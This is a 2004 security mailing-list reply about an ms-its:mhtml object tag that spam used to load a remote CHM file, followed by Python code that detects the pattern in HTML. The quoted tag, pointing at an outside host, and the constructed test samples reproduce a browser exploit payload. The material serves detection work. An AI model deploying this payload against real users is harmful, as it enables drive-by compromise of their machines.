Re: A new technique to disguise a target URL in spam

From: Jeremiah Cornelius (jeremiah_at_nur.net)
Date: 04/06/04

    To: incidents@securityfocus.com
    Date: Mon, 5 Apr 2004 18:09:59 -0700
    
    

    On Monday 05 April 2004 10:43, Stef wrote:
    > >       <object data="ms-its:mhtml:file://C
    > >       \\MAIN.MHT!http://salecheap.net//main.chm::/main.htm"
    > >       type="text/x-scriptlet"></object>
    > >       </body>
    > >       </html>
    > >       test.htm (END)
    >
    > Now how would one go about writing filters for - let's say - Snort -
    > based on something like this? Could it be - in pseudo-code - something
    > like: if location.ref <> src ==> then "take action"? Would it be safe
    > to assume that everything where the location.ref is different than src
    > is malicious?

    I would start looking at the "low-hanging fruit"...

    file://C might be a decent expression to trigger any kind of action.
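
The "low-hanging fruit" match suggested above, as an added example (not code from the thread or from either poster): it checks URL-bearing attributes for the pieces of the quoted `<object data=...>` value after decoding character references, removing line wraps and folding case, which a raw `file://C` substring match would not survive. The indicator names, function names, the `example.invalid` host and the three sample tags are constructed for illustration.

```python
import re
from html.parser import HTMLParser

# Indicators taken from the <object data=...> value quoted in the thread.
INDICATORS = {
    "file-drive": re.compile(r"file://[a-z]"),       # the "file://C" idea, any drive letter
    "ms-its": re.compile(r"ms-its:"),
    "mhtml-local": re.compile(r"mhtml:file://"),
    "remote-after-bang": re.compile(r"![a-z]+://"),  # remote URL after the '!' separator
}
URL_ATTRS = {"data", "src", "href"}

def normalize(value):
    """Remove whitespace/control characters (line wraps, tabs) and fold case."""
    return re.sub(r"[\x00-\x20]+", "", value).lower()

class _Scanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []
    def handle_starttag(self, tag, attrs):
        # HTMLParser has already decoded character references such as &#108;
        for name, value in attrs:
            if name in URL_ATTRS and value:
                norm = normalize(value)
                hits = sorted(k for k, rx in INDICATORS.items() if rx.search(norm))
                if hits:
                    self.findings.append((tag, name, hits))

def scan_html(html):
    """Return (tag, attribute, [indicator names]) for each suspicious URL attribute."""
    scanner = _Scanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings

def verdict(hits):
    """A bare file:// link only merits review; the chained form is alert-worthy."""
    chained = ("ms-its" in hits or "mhtml-local" in hits) and "remote-after-bang" in hits
    return "alert" if chained else "review"

# Constructed samples (example.invalid is a placeholder host).
THREAD_STYLE = r'<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://example.invalid//main.chm::/main.htm" type="text/x-scriptlet"></object>'
OBFUSCATED = '<OBJECT DATA="MS-ITS:mhtml:fi&#108;e://c:\\x.mht!\nhttp://example.invalid/a.chm::/a.htm"></OBJECT>'
BENIGN = '<a href="file://C:/docs/readme.txt">notes</a>'
if __name__ == "__main__":
    for sample in (THREAD_STYLE, OBFUSCATED, BENIGN):
        for tag, attr, hits in scan_html(sample):
            print(verdict(hits), tag, attr, hits)
```

The benign `file://` link still matches the single `file-drive` indicator, so that pattern alone is better treated as a review signal than as a block rule.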
